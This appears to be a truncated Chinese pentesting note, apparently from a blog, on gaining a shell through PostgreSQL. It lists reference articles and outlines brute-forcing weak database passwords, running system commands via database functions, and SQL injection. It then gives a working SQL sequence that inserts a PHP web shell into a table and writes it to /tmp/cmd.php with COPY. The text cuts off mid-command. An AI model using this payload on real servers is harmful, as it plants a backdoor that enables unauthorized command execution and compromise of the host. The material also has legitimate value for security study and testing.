(168条消息) 利用postgresql getshell_yusec的博客-CSDN博客
PostgreSQL弱口令getshell - renblog - 博客园 (cnblogs.com)
渗透中利用postgresql getshell | CN-SEC 中文网
postgreSQL数据库渗透思路
1.postgreSQL数据库暴力猜解 猜解成功后可进行的操作 - 可对数据库进行操作(增、删、改、查) - 可通过数据库函数执行系统命令 2.postgreSQL注入
getshell-1
drop table pwn; create table pwn (t TEXT); insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>'); select * from pwn; copy pwn(t) to '/tmp/cmd.php'; drop table pwn; //使用数据库写文件 copy (select &#